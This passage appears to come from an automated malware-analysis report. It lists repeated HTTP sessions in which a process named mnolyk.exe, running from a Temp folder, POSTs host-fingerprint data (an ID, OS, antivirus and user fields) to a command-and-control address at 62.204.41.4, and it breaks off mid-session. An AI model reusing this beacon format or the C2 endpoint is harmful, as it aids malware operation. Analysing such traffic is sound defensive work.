Feb 7, 2023 20:01:57.785676003 CET	372	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
239	192.168.2.6	49961	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:57.956540108 CET	373	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:58.020838022 CET	373	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.6	49742	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:56.667263031 CET	129	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:56.728579044 CET	129	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
240	192.168.2.6	49962	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:58.212789059 CET	374	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:58.280103922 CET	374	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
241	192.168.2.6	49963	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:58.504584074 CET	375	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:58.568939924 CET	375	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
242	192.168.2.6	49964	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:58.773796082 CET	376	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:58.838499069 CET	376	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
243	192.168.2.6	49965	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:59.016139984 CET	377	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:59.083553076 CET	377	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
244	192.168.2.6	49966	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:59.250310898 CET	378	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:59.315323114 CET	378	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
245	192.168.2.6	49967	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:59.487215042 CET	379	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:59.554467916 CET	379	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
246	192.168.2.6	49968	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:59.735491991 CET	380	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:59.799014091 CET	380	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
247	192.168.2.6	49969	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:59.969580889 CET	381	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:00.032289982 CET	381	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
248	192.168.2.6	49970	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:00.209992886 CET	382	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:00.275804043 CET	382	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
249	192.168.2.6	49971	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:00.459434032 CET	383	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:00.521142960 CET	384	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.6	49743	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:56.902350903 CET	130	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:56.967124939 CET	130	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
250	192.168.2.6	49973	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:00.704663992 CET	391	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:00.768744946 CET	391	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
251	192.168.2.6	49974	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:00.945241928 CET	392	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:01.010104895 CET	392	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
252	192.168.2.6	49975	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:01.204511881 CET	393	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:01.269857883 CET	393	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
253	192.168.2.6	49976	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:01.442059994 CET	394	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:01.507285118 CET	394	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
254	192.168.2.6	49977	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:01.710756063 CET	395	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:01.775300980 CET	395	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
255	192.168.2.6	49978	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:01.964464903 CET	396	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:02.029624939 CET	396	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
256	192.168.2.6	49979	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:02.207617998 CET	397	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:02.273052931 CET	397	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
257	192.168.2.6	49980	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:02:02.464632988 CET	398	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:02:02.527991056 CET	398	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:02:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
258	192.168.2.6	49981	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
